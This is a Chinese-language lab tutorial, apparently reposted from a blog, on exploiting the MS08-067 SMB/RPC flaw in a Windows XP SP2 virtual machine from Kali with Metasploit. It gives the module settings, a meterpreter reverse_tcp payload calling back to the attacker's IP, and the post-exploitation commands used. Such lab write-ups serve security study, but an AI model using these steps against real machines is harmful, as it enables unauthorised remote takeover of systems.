Loading
0

kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

漏洞简介
    MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

    如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

实验环境:

工具:metasploit

靶机两台:windows xp2和kali2020

攻击机的IP(kali):192.168.29.133

靶机IP(xp2):  192.168.29.134

实验条件:两台机子可以互通的,并且windows xp2(需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。


步骤:
(1)在kali终端输入msfconsole,启动Metasploit工具


(2)输入命令search   ms08_067,查找关于ms08_067的漏洞模块。


(3)输入如下命令,使用该漏洞模块


(4)进入这个模块后,用show options 查看该模块需要配置的参数


(5)设置配置项(show options)

设置靶机IP(xp2)set RHOST 192.168.29.134


设置要执行的payload: set payload windows/meterpreter/reverse_tcp


设置攻击机的IP(kali):set LHOST 192.168.29.133


设置要攻击的目标操作系统类型:set target 34

show options查看相关参数是否配置正确


6)最后,输入exploit,回车运行,进入到特殊的payload---meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置。

注:本文转自:https://blog.csdn.net/qq_50854662/article/details/116896715

【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。